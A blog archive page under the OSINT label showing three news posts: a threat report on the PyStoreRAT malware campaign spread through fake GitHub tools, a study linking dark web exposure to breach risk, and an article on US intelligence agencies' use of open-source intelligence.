Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label OSINT. Show all posts
PyStoreRAT
GitHub Malicious Campaign malware OSINT PyStoreRAT

Fake GitHub OSINT Tools Spread PyStoreRAT Malware

 

Attackers are using GitHub as part of a campaign to spread a novel JavaScript-based RAT called PyStoreRAT, masquerading as widely used OSINT, GPT, and security utilities targeting developers and analysts. The malware campaign leverages small pieces of Python or JavaScript loader code hosted on fake GitHub repositories, which silently fetch and execute remote HTML Application (HTA) files via mshta.exe, initiating a multi-stage infection chain. 

PyStoreRAT is said to be a modular, multi-stage implant that can load and execute a wide range of payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules, making it highly versatile once a breach has been established. One of the most prominent follow-on payloads is the Rhadamanthys information stealer, which specializes in the exfiltration of sensitive information, including credentials and financial data. The loaders arrive embedded in repositories branded as OSINT frameworks, DeFi trading bots, GPT wrappers, or security tools; many of these hardly work past statically showing menus or other placeholder behavior to appear legitimate.

It is believed the campaign started at around mid-June 2025, with the attackers publishing new repositories at a steady pace, and then artificially inflating stars and forks by promoting those on YouTube, X, and other platforms. When these tools started gaining traction and hit GitHub's trending lists, the threat actors slipped in malicious "maintenance" commits in October and November, quietly swapping or augmenting the code to insert the loader logic. This factor of abusing GitHub's trust model and popularity signals echoes a trend seen in supply chain-like gimmicks such as Stargazers Ghost Network tactic.

Subsequently, the loader retrieves a distant HTA, which installs PyStoreRAT, a tool that profiles the system, identifies whether it has administrator privileges, and searches for cryptocurrency wallet artifacts involving services such as Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. It also identifies installed anti-virus software and searches for strings such as “Falcon” and “Reason,” which are attributed to CrowdStrike and Cybereason/ReasonLabs, with what appears to be a modification of the path used to execute mshta.exe to avoid detection. 

It uses a scheduled task, which is disguised as an NVIDIA self-update, with the RAT communicating with a distant server for command execution, which includes but is not limited to downloading and executing EXE payloads, delivering Rhadamanthys, unzip archives, loading malicious DLLs via rundll32.exe, unpacking MSI packages, executing PowerShell payloads within a suspended process, instantiating additional mshta.exe, and propagate via portable storage devices by embedding armed LNK documents. 

Additionally, it has the capacity to eliminate its own scheduled tasks, which is attributed to making reverse-engineering even more complicated. The Python-based weapons have revealed Russian language artifacts as well as programming conventions that indicate a probable Eastern European adversary, who has described PyStoreRAT as part of a growth toward adaptable, script-based implants that avoid common detection on a targeted environment until a very late stage in the fight.
Read more »
Security System
Cyber Attacks Dark Web leaked credentials OSINT Security System

Dark Web Exposure Increases Risk of Cyber Attacks, Study Finds

 



A new research study has determined that any companies that are ever mentioned on the dark web will be much more vulnerable to cyberattacks. In collaboration with Marsh McLennan's Cyber Risk Intelligence Center, Searchlight Cyber has carried out research on more than 9,000 organizations, revealing that dark web exposure has a strong link to breaches in cybersecurity. This has established a critical urgency for businesses to track their presence online and develop better security protocols.


How the Dark Web Poses a Threat to Businesses  

The dark web is a hidden part of the internet where cybercriminals operate anonymously. It is commonly used for illegal activities, including the sale of stolen data such as passwords, financial records, and personal information. Many businesses are unaware that their sensitive data is already circulating on the dark web, making them prime targets for cyberattacks.

Based on the study, companies that experienced any type of exposure on the dark web suffered a 3.7% breach rate over four years. This simply means that after an organization's information hits underground marketplaces, hacking forums, or leaked databases, the chance of a security breach becomes a lot higher.

The researchers found several routes through which a company's information can find its way to the dark web, each step of which heightens the potential for cyberattacks: 

1. Exposed Employee Credentials  

In case employee login credentials (e.g., email and password) are leaked, the chances of hacking into a company increase by 2.56 times. The hackers use these leaked credentials to infiltrate internal systems without authorization.


2. References on Dark Web Marketplaces  

 Being associated with an underground trading platform increases a company's chance of being targeted by 2.41 times. Mainly, the hackers sell the stolen information to other attackers for use.  

3. Company Network Tied to Dark Web

If an organization's IT systems have activity on the dark web, whether intentional or accidental, an attack will happen 2.11 times more frequently.

4. Paste Sites Data Leaks 

Pastes are commonly used by hackers to share data that they have stolen from an organization. If a company's data is posted on such sites, there is an 88% increase in the possibility of breach.

5. Public Exposure through OSINT  

At times, some companies' information might be published due to either a misconfigured environment or breaches in data storage. If there is a firm's exposure within OSINT reports, then that increases the business's risk level by 2.05 times.

This research also demonstrated that companies featured in five or more of these risk categories had a 77% chance of facing a cyberattack than companies without any. 


How Companies Can Protect Themselves

Cyberattacks have been increasing by the day. Businesses, therefore, have to take proactive steps to ensure the security of their sensitive data. Experts say companies should consider taking the following actions: 


  •  Check the Dark Web Daily

Businesses must employ cybersecurity that scans the dark web for data breaches and responds immediately if data belonging to a company is located. 


  •  Strong Password Policies 

 Employees must be compelled to use strong passwords and to also activate MFA to block hackers from unauthorized access. 


  •  Frequently Update Security Systems

Software updates and system patches keep cybercriminals from exploiting vulnerabilities in outdated technology.


  •  Train Employees on Cybersecurity Risks 

  Human error is one of the biggest causes of cyber breaches. Educating staff on how to identify phishing scams and suspicious activities can significantly reduce security threats.


Why Dark Web Awareness is Crucial

According to Ben Jones, CEO of Searchlight Cyber, companies must be aware of their dark web exposure. Hackers, he explained, plan cyberattacks in underground forums and marketplaces and use leaked credentials to gain access to company systems.

By monitoring their exposure, strengthening their security policies, and educating employees, businesses will be able to minimize their risk and stay one step ahead of cybercriminals. Protect sensitive information before an attack happens and save money on security breaches.


Read more »
U.S. Spy Agencies
China Covid Intelligence agencies National Intelligence Open-Source intelligence OSINT Spy Agency Technology U.S. U.S. Intelligence U.S. Spy Agencies

US Spies Lag Rivals in Gathering Data That is Concealed From Plain Sight


As the alarms start to go off globally about the spread of the covid virus in China, official authorities in Washington are now concerned about the threat the virus may pose in America. In regards to this, they have turned to U.S. intelligence for insight. 

Although, according to a recent congressional review of classified reports from December 2019 and January 2020, the most prevalent early warnings did not come from spies or intercepts. Instead, officials relied on citizen journalists, reporting public, and diplomatic cables, as well as analysis from medical professionals – some instances of the so-called open-source intelligence (OSINT). 

Predicting the next potential pandemic or the next government to fall will require better utilization of open-source materials, the review noted. 

In a review conducted by Democrats on the House Intelligence Committee, the authors wrote, “There is little indication that the Intelligence Community’s exquisite collection capabilities were generating information that was valuable to policymakers.” 

This echoes what numerous current and former intelligence officials are increasingly alerting of, i.e. As opponents like China boost their efforts, the $90 billion U.S. spy infrastructure is falling behind because it has not embraced gathering open-source intelligence. 

Traditional Intelligence is Still Prevalent 

While open-source intelligence has become an important tactic in recent times, this does not budge the relevance of conventional intelligence. Spy agencies have unique powers in order to penetrate global communications and cultivate agents. For instance, when the Biden administration made the intelligence conclusions indicating Russian President Vladimir Putin intended to invade Ukraine public, they achieved a high-profile accomplishment. 

Nonetheless, officials and professionals have raised concerns over the fact that the U.S. did not invest sufficient people or finance in analyzing publicly available data. They as well claim that the U.S. did not efficiently utilize advanced technologies in order to yield critical insights. 

Commercial satellite images, social media, and other web data have increased the ability of private enterprises and unbiased analysts to disclose state secrets. And there are rising concerns in Washington about Beijing's influence over popular apps like TikTok, as it is well known that Beijing has stolen or gained control over vast amounts of data on Americans. 

"Open source is really a bellwether for whether the intelligence community can protect the country […] We collectively as a nation aren't preparing a defense for the ammunition that our adversaries are stockpiling," says Kristin Wood, a former senior official at the CIA, currently a chief executive at the Grist Mill Exchange, a commercial data platform. 

Barriers Concerning Open-Source 

Intelligence agencies have noted several barriers in regard to open-source intelligence. Some are technological. For instance, access to unclassified internet or open data sources is frequently difficult for officers working on classified networks. Concerns about civil liberties and upholding First Amendment rights are also present. 

While some experts also raise questions about whether agencies are held back by the reflexive belief that top-secret information is far more valuable. 

Rep. Jim Himes, a Connecticut Democrat, and longtime Intelligence Committee member says that he believed there is needed to be “some cultural change inside places like the CIA where people are doing what they’re doing for the excitement of stealing critical secrets as opposed to reviewing social media pages.” 

Open-Source Capability of the U.S. 

According to Frederick Kagan, a senior authority at the American Institute who looks after the creation of those reports, “There is a lot of open-source capability that the U.S. intelligence community can pretty much rely on to be there […] What it needs to do is figure out how to leverage that ecosystem instead of trying to buy it.” 

Of the 18 U.S. intelligence agencies, most of them utilize open-source programs, from the CIA’s Open-Source Enterprise to a 10-person program in the Department of Homeland Security’s intelligence arm. 

Although, the top officials do acknowledge the lack of consistency across those programs in the way they analyze open-source information or how they use and share it. In regards to the same, Avril Haines, the U.S. director of national intelligence has said, “We’re not paying enough attention to each other and so we’re not learning the lessons that different parts of the (intelligence community) are learning, and we’re not scaling solutions, and we’re not taking advantage of some of the outside expertise and information and work that could be taken advantage of.”  

Read more »
Subscribe to: Comments (Atom)